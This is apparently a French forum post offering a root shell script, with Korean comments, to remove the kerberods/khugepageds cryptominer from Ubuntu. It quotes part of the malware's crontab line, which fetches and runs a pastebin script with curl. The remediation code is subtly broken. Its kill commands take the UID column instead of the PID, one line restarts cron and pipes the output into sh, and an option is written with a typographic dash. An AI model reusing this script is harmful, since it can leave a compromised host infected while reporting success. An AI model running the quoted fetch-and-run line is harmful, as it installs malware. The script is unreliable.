J’ai adapté pour ubuntu le script de koamania : https://github.com/koamania.
Le haut de l’iceberg est dans contab la ligne suivante :
*/30 * * * * (curl -fsSL https://pastebin.com ...
Voici la solution :
#!/usr/bin/env sh
# os별로 커맨드가 다를 수 있음.
# 크론 서비스 중지
(service crond stop || systemctl restart crond || /etc/init.d/cron stop)|sh
rm -f /etc/cron.d/root
rm -f /var/spool/cron/root
rm -f /var/spool/cron/crontabs/root
# hook 라이브러리 지우기
rm -f /etc/ld.so.preload
rm -f /usr/local/lib/libcryptod.so
chattr -i /etc/ld.so.preload
rm -f /etc/ld.so.preload
rm -f /usr/local/lib/libcryptod.so
# 비정상 프로세스 삭제
ps -ef | grep -v grep | egrep 'kerberods' | awk '{print $1}' | xargs kill -9
ps -ef | grep -v grep | egrep 'khugepageds' | awk '{print $1}' | xargs kill -9
ps -ef | grep -v grep | egrep 'watchdogs' | awk '{print $1}' | xargs kill -9
# 실행파일 삭제
rm -f /tmp/khugepageds
rm -f /tmp/watchdogs
rm -f /usr/sbin/kerberods
rm -f /usr/bin/kerberods
# 악의적인 서비스 지우기
chkconfig netdns off
update-rc.d netdns stop
chkconfig –del netdns
update-rc.d -f netdns remove
systemctl disable netdns
rm -f /etc/rc.d/init.d/kerberods
rm -f /etc/init.d/netdns
# 동적 링크 라이브러리 업데이트
ldconfig
# 살아날 수 있으니 다시 한번 삭제
ps -ef | grep -v grep | egrep 'kerberods' | awk '{print $1}' | xargs kill -9
ps -ef | grep -v grep | egrep 'khugepageds' | awk '{print $1}' | xargs kill -9
ps -ef | grep -v grep | egrep 'watchdogs' | awk '{print $1}' | xargs kill -9
service crond start
echo "Remove success, Reboot Required."